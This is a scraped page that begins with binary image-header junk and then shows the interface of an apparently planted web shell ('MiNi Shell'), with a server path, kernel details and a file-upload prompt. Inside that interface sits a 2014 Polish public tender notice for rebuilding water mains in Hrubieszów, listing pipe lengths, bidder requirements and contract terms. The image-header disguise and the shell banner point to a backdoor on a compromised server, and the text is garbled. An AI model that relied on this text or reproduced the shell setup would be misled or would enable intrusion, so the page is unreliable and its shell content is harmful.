JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140404/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140404/116158-N-2014.html

<p class="kh_header"><b>Hrubieszów: Przebudowa 6 486,50 mb. sieci wodociągowej, 115 szt. przyłączy wodociągowych w miejscowości Hrubieszów - część 2 (Południe część I, osiedle HSM oraz ul. Zamojska) w ramach realizacji projektu pn.: Czysta Woda na Pobużu - Transgraniczny System Zaopatrzenia w wodę          Hrubieszowa i Włodzimierza Wołyńskiego - ETAP II</b><br>
<b>Numer ogłoszenia: 116158 - 2014; data zamieszczenia: 04.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Hrubieszów , ul. mjr H. Dobrzańskiego "Hubala" 1, 22-500 Hrubieszów, woj. lubelskie, tel. 084 6962380 w. 56, faks 084 6962380.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miasto.hrubieszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa 6 486,50 mb. sieci wodociągowej, 115 szt. przyłączy wodociągowych w miejscowości Hrubieszów - część 2 (Południe część I, osiedle HSM oraz ul. Zamojska) w ramach realizacji projektu pn.: Czysta Woda na Pobużu - Transgraniczny System Zaopatrzenia w wodę          Hrubieszowa i Włodzimierza Wołyńskiego - ETAP II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> II.1.	Przedmiotem zamówienia jest : Przebudowa 6 486,50 mb sieci wodociągowej, 115 szt. przyłączy wodociągowych w miejscowości Hrubieszów - część 2 (Południe część I, osiedle HSM oraz ul. Zamojska) w ramach realizacji projektu pn.: Czysta Woda na Pobużu - Transgraniczny System Zaopatrzenia w wodę Hrubieszowa i Włodzimierza Wołyńskiego - ETAP II. 
Dofinansowanie zadania pochodzi ze środków Europejskiego Instrumentu Sąsiedztwa            i Partnerstwa w ramach Programu Współpracy Transgranicznej Polska - Białoruś - Ukraina 2007-2013. Priorytet 1. Wzrost konkurencyjności obszaru przygranicznego. Działanie 1.3. Poprawa dostępności regionu.
II.2.	Wykonanie i oddanie zgodnie z projektem budowlanym, specyfikacją techniczną wykonania    i odbioru robót, pozwoleniem na budowę, przepisami, w tym : techniczno- budowlanymi oraz zasadami wiedzy technicznej i sztuki budowlanej przewidzianej w umowie przebudowanej sieci wodociągowej obejmującej poniższe ulice : ul. Pobereżańska, ul. Polna, ul. Mickiewicza, ul. Listopadowa, ul. Gródecka, ul. Krótka, ul. Krasickiego, ul. Zamojska, osiedle HSM- ul. Piłsudskiego. 
II.3.	Trasy sieci przebiegają po terenie stanowiącym własność Gminy Miejskiej Hrubieszów, w pasie dróg krajowych, wojewódzkich, powiatowych i gminnych. 
W zakres przebudowy sieci wodociągowej wchodzi:
-	likwidacja (demontaż) wodociągu w zakresie średnic DN25 - DN300 
wraz z armaturą (dotyczy odcinków wykonywanych wykopem otwarty)
-	likwidacja hydrantów, skrzynek ulicznych na nieczynnych sieciach)
-	demontaż uzbrojenia przepinanych przyłączy wodociągowych
-	demontaż wymienianych zasuw
-	likwidacja części komór zasuw
-	budowa nowych przewodów wodociągu w zakresie średnic DN32 - DN300 wraz z armaturą
-	przełączenie istniejących odbiorców do wykonanej sieci wodociągowej
-	naprawa pozostałych komór zasuw.
Część przewodów sieci wodociągowej znajduje się w pasie dróg o różnych kategoriach. Wiąże się to dodatkowo z robotami demontażowymi i odtworzeniowymi ciągów jezdnych, pieszo-jezdnych, pieszych i poboczy.

II.4.	ZAKRES PRZEDMIOTU ZAMÓWIENIA 
Przebudowa 6 486,50 mb sieci wodociągowej, 115 szt. przyłączy wodociągowych           w miejscowości Hrubieszów-część 2 (Południe część I, osiedle HSM oraz ul. Zamojska)

II.4.1.	Zakres robót Południe 1 obejmuje :
-	DN300 (przewiert sterowany)	 460,5 m
-	DN300 (wykop otwarty)	129,0 m
-	DN250 (przewiert sterowany)	134,5 m
-	DN250 (wykop otwarty)	110,5 m
-	DN250 (kraking)	776,5 m
-	DN200 (przewiert sterowany)	1047,5 m
-	DN200 (kraking )	455,5 m
-	DN200 (wykop otwarty )	161,5 m
-	DN150 (przewiert sterowany)	490,5 m
-	DN150 (wykop otwarty)	97,0 m
-	DN125 (przewiert sterowany)	153,0 m
-	DN125 (wykop otwarty)	31,0 m
-	DN100 (przewiert sterowany)	190,5 m
-	DN100 (wykop otwarty)	70,0 m
-	DN80 (wykop otwarty)	13,5 m
	DN65 (wykop otwarty)	104,0 m
Razem: 4 425,0 m
II.4.2.	Przyłacza wodociągowe:
-	DN50 (wykop otwarty)	34,5 m
-	DN40 (wykop otwarty)	65,0 m
-	DN32 (wykop otwarty)	7,5 m
Razem: 107,0 m
II.4.3.	podłączenia (przepięcie istniejących+nowe	104 szt.
-	DN65 (wykop otwarty)	45,0 m
-	DN50 (wykop otwarty)	153,0 m
-	DN25 (wykop otwarty)	9,0 m
Razem: 207,0 m
II.4.4.	Zakres robót na osiedlu HSM  obejmuje poniższy :
-	DN150 (wykop otwarty)	53,5 m
-	DN150 (przewiert sterowany)	380,0 m
-	DN100 (wykop otwarty)	95,0 m
-	DN65 (wykop otwarty)	209,5 m
-	DN65 (przewiert sterowany)	139,5 m
-	DN50 (wykop otwarty)	119,5 m
-	DN50 (przewiert sterowany)	146,0 m
-	DN40 (wykop otwarty)	39,5 m
Razem: 1549,5 m
II.4.5.	Zakres robót ul. Zamojska obejmuje :
-	DN100 	146,0 m
-	podłączenia domowe (przepięcie istniejących+nowe)	11 szt.

II.4.6.	Opłata za zajęcie pasa drogowego na czas budowy (nie ujęte w Przedmiarze Robót).
II.4.7.	Usługa geodezyjna - wytyczenie trasy sieci oraz inwentaryzacja powykonawcza 
(nie ujęte w Przedmiarze Robót).
II.4.8.	Wykonawca budowy musi tak zorganizować plac budowy, aby była zachowana ciągła dostawa wody do istniejących budynków. Brak dostawy wody musi być zrekompensowany dostawą wody w beczkowozach oraz pojemnikach plastikowych.
W przedmiarze robót przewidziano zasilanie awaryjnym rurociągiem!
II.4.9.	Szczegółowy zakres oraz technologię robót określa dokumentacja projektowa wraz          ze specyfikacją techniczną wykonania i odbioru robót budowlanych załącznik nr 12     oraz przedmiary robót Załącznik nr 11 .
II.4.10.	Przedmiary robót będące załącznikiem do SIWZ mają charakter pomocniczy                i informacyjny.



II.5.	Parametry jakim powinny odpowiadać zastosowane materiały.
II.5.1.	Przewody
Sieć wodociągową należy wykonać z zastosowaniem rur PE 100 RC SDR 11 w zakresie średnic zgodnych z charakterystyką sieci.
Jeżeli w projekcie, przedmiarze robót bądź specyfikacji technicznej wykonania i odbioru robót występują wskazania materiałowe typu znaków towarowych, patentów, nazw własnych lub pochodzenia (producenta), to należy odczytywać je jako przykładowe i służą one określeniu pożądanego standardu wykonania                  i określeniu właściwości i wymogów technicznych założonych w dokumentacji technicznej dla danych rozwiązań. Dopuszcza się równoważne rozwiązania              (w oparciu o produkty innych producentów) pod warunkiem spełnienia tych samych właściwości technicznych. Zgodnie z art. 30 ust. 5 Ustawy Prawo zamówień publicznych Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego roboty budowlane spełniają wymagania określone przez Zamawiającego.       W związku z powyższym Wykonawca zobowiązany jest przedstawić zamienne rozwiązania na piśmie (dane, techniczne, atesty, dopuszczenia do stosowania)           w postaci stosownego projektu na etapie składania ofert.
II.5.2.	Zamawiający zastrzega sobie prawo wystąpienia do autora dokumentacji projektowej       o opinię na temat oferowanych materiałów lub urządzeń. Opinia ta może stanowić podstawę do podjęcia przez Zamawiającego decyzji o przyjęciu materiałów lub urządzeń równoważnych albo odrzuceniu oferty z powodu braku równoważności.
II.6.	Pochodzenie zastosowanych materiałów.
Pochodzenie zdefiniowane w artykułach 23 i 24 Rozporządzenia Rady (EWG) nr 2913/92   z dnia 12 października 1992 r. Wszystkie dostawy i materiały muszą pochodzić ze Wspólnoty Europejskiej, lub krajów będących beneficjentami rozporządzenia (WE) NR 1638/2006 Parlamentu Europejskiego i Rady, lub krajów będących beneficjentem pomocy przedakcesyjnej ustanowionego Rozporządzenia Rady (WE) nr 1085/2006 z dnia 17 lipca 2006 r. ustanawiającym instrument pomocy przedakcesyjnej lub Państw członkowskich EOG. Jeśli akt prawny lub inny instrument odnoszący się do programu, z którego pochodzi dofinansowanie, określa zasady kraju pochodzenia dostaw nabywanych przez Beneficjenta w odniesieniu do dofinansowania, oferent zobowiązany jest podać kraj pochodzenia dostaw. Dla celów niniejszego załącznika termin- kraj pochodzenia- używany jest w znaczeniu określonym w artykułach 23 i 24 Rozporządzenia Rady (EWG) nr 2913/92 z dnia                 12 października 1992 roku ustanawiającego Wspólnotowy Kodeks Celny oraz innych aktów wspólnotowych dotyczących pochodzenia niepreferencyjnego. Wykonawcy powinni przedstawić dowód pochodzenia Beneficjentowi nie później niż w chwili wystawienia pierwszej faktury. Świadectwo pochodzenia powinno zostać wystawione przez właściwe władze państwa pochodzenia dostaw i musi być zgodne z zasadami określonymi we właściwych przepisach Wspólnotowych. Dowody pochodzenia będą musiały być dołączone do wniosków o płatność..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.23.13.00-8, 45.23.21.00-3, 45.23.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 50 000,00 zł. (słownie: pięćdziesiąt tysięcy zł 0/100).
Wadium należy wnieść w terminie do dnia 25.04. 2014r. do godz. 13.00</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań w tym zakresie .Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczeń wymienionych w IX pkt niniejszej SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga posiadania niezbędnej wiedzy i doświadczenia tj.        w okresie ostatnich pięciu lat, a jeżeli okres działalności jest krótszy w tym okresie, wykonania minimum jednej roboty odpowiadającej rodzajem robocie będącej przedmiotem zamówienia. Za robotę odpowiadającą swoim rodzajem robotom stanowiącym przedmiot zamówienia, Zamawiający uzna roboty budowlane na budowę sieci wodociągowych wykonanych w okresie ostatnich 5 lat lub jeżeli okres działalności jest krótszy, w tym okresie których łączna wartość wyniosła 1,5 mln zł w tym co najmniej 1 robotę budowlaną o wartości powyżej 500 tys. zł polegającą na budowie sieci wodociągowej w terenie zabudowanym                        z infrastrukturą podziemną i nadziemną. 
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców poświadczeń lub dokumentów, z których jednoznacznie musi wynikać, iż w/w warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań w tym zakresie. Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczeń wymienionych w IX pkt niniejszej SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga dysponowania osobami zdolnymi do wykonania zamówienia tj. dysponowania co najmniej po jednej osobie, która posiada uprawnienia budowlane w zakresie kierowania robotami budowlanymi.
Warunek zostanie spełniony po przedłożeniu wykazu i oświadczenia j.n.:
wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności    z uprawnionymi do pełnienia samodzielnych funkcji technicznych w budownictwie odpowiedzialnych za kierowanie robotami budowlanymi  w specjalnościach:
Kierownik robót branży instalacyjnej w zakresie sieci, instalacji i urządzeń sanitarnych:
Minimalne wymagania w stosunku do w/w osoby:
-uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, zgodnie z obowiązującymi przepisami prawa;
-co najmniej 5 letnie doświadczenie zawodowe przy kierowaniu robotami jako kierownik robót branży sanitarnej, liczone od daty uzyskania uprawnień zgodnych z powyższymi wymaganiami, 
Kierownik robót branży drogowej:
Minimalne wymagania w stosunku do w/w osoby:
-uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń, zgodnie z obowiązującymi przepisami prawa;
-co najmniej 5 letnie doświadczenie zawodowe przy kierowaniu robotami jako kierownik robót branży drogowej, liczone od daty uzyskania uprawnień zgodnych z powyższymi wymaganiami. 
-oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca wykazał się sytuacją ekonomiczną i finansową         zapewniającą wykonanie zamówienia, a w szczególności wykażą dysponowanie środkami     finansowymi lub zdolnością kredytową na kwotę co najmniej 500.000 złotych oraz opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest            ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż w/w warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz oferty, wzór stanowiący załącznik nr 1 do SIWZ.
2.	W przypadku udziału podwykonawców  wzór załącznik nr 6.
3.	Pisemne zobowiązanie innych  podmiotów do oddania wykonawcy  do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - wzór załącznik nr 8   jeżeli dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zawarta umowa może ulec zmianie w szczególności w zakresie zapisów obejmujących: termin zakończenia realizacji przedmiotu zamówienia i wysokość wynagrodzenia za wykonanie przedmiotu zamówienia. Zmiany umowy, o których mowa dopuszczalne są w przypadku:
1.	gdy przedłuża się termin wykonania umowy o czas, na jaki zostanie przedłużony termin wykonania robót budowlanych,
2.	gdy zawiesza się wykonanie umowy na okoliczność wniesienia odwołania
3.	zmian po zawarciu umowy przepisów prawa lub wprowadzenia nowych przepisów prawa lub zmiany lub wprowadzenia nowej bezwzględnie obowiązującej normy powodującej konieczność zmiany, modyfikacji lub odstępstwa w odniesieniu                       do wynagrodzenia
4.	zmian organizacyjnych polegających w szczególności na zmianie, podwykonawców, grup wykonawców i innych podmiotów współpracujących przy realizacji zamówienia pod warunkiem, że ich uprawnienia, potencjał ekonomiczny, wykonawczy i doświadczenie nie są gorsze od tych, jakie posiadają podmioty zamieniane,
5.	wydania decyzji administracyjnych lub innych aktów władzy (decyzja władz publicznych, w tym oczekiwanie na nieprzewidziane wcześniej konieczne wyniki ekspertyz, wyrok sądu itp.) jeśli  ich wydanie nastąpiło na skutek okoliczności niezależnych                  od Wykonawcy,
